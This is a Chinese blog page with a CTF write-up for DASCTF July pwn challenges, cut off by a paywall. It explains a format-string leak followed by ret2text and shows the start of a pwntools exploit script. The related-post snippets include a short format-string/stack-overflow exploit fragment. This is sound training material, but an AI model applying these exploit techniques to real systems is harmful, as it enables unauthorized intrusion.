DASCTF 7月部分pwn

最新推荐文章于 2024-08-25 12:49:51 发布
最新推荐文章于 2024-08-25 12:49:51 发布
阅读量1.5k 收藏 3
点赞数 2
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43116977/article/details/107580414
版权
本文详细介绍了DASCTF中涉及的pwn题目,包括pwn1的格式化字符串漏洞利用,eg32的爆破策略,以及bigbear的libc2.30下UAF问题。尽管存在沙盒保护,作者通过泄露libc地址和栈地址,尝试使用ORW进行攻击。总结中提到,时间紧迫导致未能完成全部题目,期待pwn2的解决方案。
摘要由CSDN通过智能技术生成

做了pwn1跟pwn3,pwn2没做出来(俺是废物)…

这里写目录

pwn1

签到题,但是我们要记住

.text:080485F8                 mov     eax, 0
.text:080485FD                 mov     ecx, [ebp+var_4]
.text:08048600                 leave
.text:08048601                 lea     esp, [ecx-4]
.text:08048604                 retn

32位的main的最后有一个将ebp转为esp的代码,如果你栈溢出破坏了ebp,会导致[ecx-4]报错,
因此这个题的做法也很简单,利用格式化字符串漏洞泄露ebp,然后通过gets来进行ret2text

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('qiandao')
p = 0
def pwn(ip,port,debug):
	global p
	if(debug == 1):
		p = process('./qiandao')

	else:
		p = remote(ip,port
最低0.47元/天 解锁文章
starssgo
关注
DASCTF2020-7pwn学习记录
weixin_44864859的博客
08-11 911
DASCTF2020-7赛 虚假的签到题 说实话有点被出题人恶心到了,主要还是自己太菜了。。。???? 拿到题目直接ida打开,按f5一顿分析 就这太简单了吧!先格式化字符串漏洞,后栈溢出,猜想肯定是先用格式化字符串泄漏canary,再利用栈溢出控制程序流,执行后门函数。查看保护机制 嗯。。。没有canary保护,那这个格式化字符串漏洞是干嘛用的?然后直接栈溢出发现拿不到shell。这就很奇怪了???其实到这里就到死胡同了,我们回头来看一下main函数的汇编代码,可以看到出题人在程序的最后做了修改
2020DASCTF赛-bulls**t
k0414的博客
07-25 1747
题目: def pairing(a,b): shell = max(a, b) step = min(a, b) if step == b: flag = 0 else: flag = 1 return shell ** 2 + step * 2 + flag def encrypt(message): res = '' for i in range(0,len(message),2): res +=
[DASCTF2024八开学季!] Crypto
最新发布
Emmaaaaa's blog
08-25 1470
two_squares(n0),矩阵phi,维纳连分数,HNP,中间相遇
DASCTF赛-web
Pr0m1se1n的博客
08-06 707
之前复现的了。。哎 Ezfileinclude 首页一张图片,看src就可以看出文件包含 验证了时间戳,参数t很容易能看出来 尝试用php://filter 伪协议读源码读不到,发现是用…/路径穿越 然后flag文件后缀不是是.php .txt .jpg什么的,就是flag!!! 直接来大师傅的脚本 import time import requests import base64 time = time.time() #获取时间戳(默认浮点型) t = int(time) #获取整型时间戳 pri
DASCTF2020 7
qq_42158602的博客
07-25 761
bullshit 题目 from flag import flag def pairing(a,b): shell = max(a, b) step = min(a, b) if step == b: flag = 0 else: flag = 1 return shell ** 2 + step * 2 + flag def encrypt(message): res = '' for i in range(0,le
DASCTF 7赋能赛pwn wp
N1rvana的博客
07-25 520
DASCTF 7赋能赛pwn wp
DASCTF 6部分pwn wp
starssgo的博客
06-27 1232
感觉质量挺高的,有点昏迷, 目录Memory-Monster-IVoooooordereasyheapspringboardsecret写在最后 Memory-Monster-IV 这个题我是真的服了,恶心了我一天时间,最后还是没出,知道是要改got表,而且每次只能改一个字节,第一次改后变成ret之类的无用函数,我是不想说啥,没复现出来,贴下作者的分析把: http://taqini.space/2020/06/26/DASCTF-June-Memory-Monster-IV-200pt/ 我感觉能学到的东
DASCTF6Pwn-azez_heap wp
qq_31457355的博客
10-07 1221
本次比赛是dasctf6赛,学到了很多东西,感谢 1.首先着重记录一下azez_heap这个题目,剩下的题目放在另一篇博客 知识点: _IO_flush_all_lockp 触发条件 反向shell的利用 分析: checksec: 保护全开,毋庸置疑 通过ida分析可以确定程序的唯一漏洞点在edit里面,可以控制下一个堆块的fd和bk add里面size可以申请到0x2333已经很大了,根据以往的做题经验可以想到要打global_max_fast,而且堆块使用calloc分配,我们知道calloc
Dasctf 6赛其余pwn WP
qq_31457355的博客
11-01 607
copy: 这题主要是堆风水的利用,通过运行我们可以发现,每次申请块之后都会free掉这个块,但是接下来执行删除操作的时候我们还可以利用这个指针因此存在uaf漏洞,剩下的就是堆风水的利用了,不再赘述 exp: #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import os from pwn import * #from LibcSearcher import LibcSearcher # context.log_level = 'debu
DASCTF2022 7赋能赛 crypto wp(DASCTF2022.07赋能赛Pwn easyheap)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
08-29 412
文章目录DASCTF2022 7赋能赛 crypto wp sigin ezNTRU NTRURSA
DASCTF July X CBCTF 4th--ezrce
qq_46263951的博客
08-05 305
YAPI Mock远程代码执行漏洞 YAPI使用mock数据/脚本作为中间交互层,其中mock数据通过设定固定数据返回固定内容,对于需要根据用户请求定制化响应内容的情况mock脚本通过写JS脚本的方式处理用户请求参数返回定制化内容,本次漏洞就是发生在mock脚本服务上。由于mock脚本自定义服务未对JS脚本加以命令过滤,用户可以添加任何请求处理脚本,因此可以在脚本中植入命令,等用户访问接口发起请求时触发命令执行。 添加一个项目后,这里是最关键的 const sandbox = this const
[DASCTF 2023 & 0X401七暑期挑战赛] REV1 controlflow复现
weixin_52640415的博客
07-23 1400
花指令
DASCTF
qq_53755216的博客
04-08 832
ez_serialize 题目网址: http://684f47cd-5c9d-41cb-ad29-98d48096cc9a.machine.dasctf.com/ <?php error_reporting(0); highlight_file(__FILE__); class A{ public $class; public $para; public $check; public function __construct() { $thi
[DASCTF][Java反序列化]easyjava简单分析
Y4tacker的博客
08-02 2586
文章目录写在前面easyjava推荐文章 写在前面 昨天题目环境似乎出了点小问题,咋也不好问,咋也不敢说,题目有意思,当然还有其他链子猜测jdbc应该也可以打,没试过太懒了 easyjava 首先下载源码发现Java版本是1.7的,先放这里 看看在evil路由下面,很明显是去触发反序列化,但是有过滤 ban了这么多,cc链基本上不用想了,一方面是低版本不起作用,另一方面Transformer被ban了,看来只能用TemplatesImpl去执行字节码试一试,想到了Java7U21反序列化(可以看我博客分
DASCTF:BitMap
末初的CSDN博客
10-14 1690
来源于今天一位师傅给的题目附件,从解出来的flag只知道是安恒的题目,但是具体哪里的就不清楚了,觉得题目还有记录一下的价值 BitMap文件很明显是bmp图片修改了BMP文件头和位图信息头,不过一些还原信息的必要数据位置还是给了出来的,比如位深度 详细的还原过程可以参考我之前给白帽子社区端午节活动的出的题目:白帽子社区端午节活动-白帽寻宝记-纪念屈原Writeup 这里可以添加一个后缀.bmp,然后使用010 Editor打开;借助010 Editor强大的插件分析功能,还是能显示出文件基本结构 可以.
DASCTF_Misc_holmes
Le1a's Blog
05-29 319
下载附件得到一张福尔摩斯的图片 上面有跳舞小人加密,通过对照表解密得到YOUAREHOLMES 用Foremost分离得到一个压缩包,用刚刚得到的YOUAREHOLMES作为密码解压得到一个python文件,打开得到一个程序 flag="flag{********************************}" encflag=[] for i in range(len(flag)): encflag.append((ord(flag[i])+i)%128) print(encflag) '
DASCTF 2022.4
weixin_44687621的博客
04-25 2731
Web warmup_php 查看主页源码如下 <?php spl_autoload_register(function($class){ require("./class/".$class.".php"); }); highlight_file(__FILE__); error_reporting(0); $action = $_GET['action']; $properties = $_POST['properties']; class Action{ public funct
DASCTF 虚假的签到
qq_45631641的博客
07-25 464
格式化字符串 栈溢出 调试得%2$x时为栈地址 from pwn import * context.log_level='debug' #sh=process('./qiandao') sh=remote('183.129.189.60','10013') sh.recv() sh.sendline('%2$x') t=sh.recv(8) print t sh.recv() sleep(0.2) print t x=int(t,16) ret=0x0804857D sh.sendline('a'*0x.
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值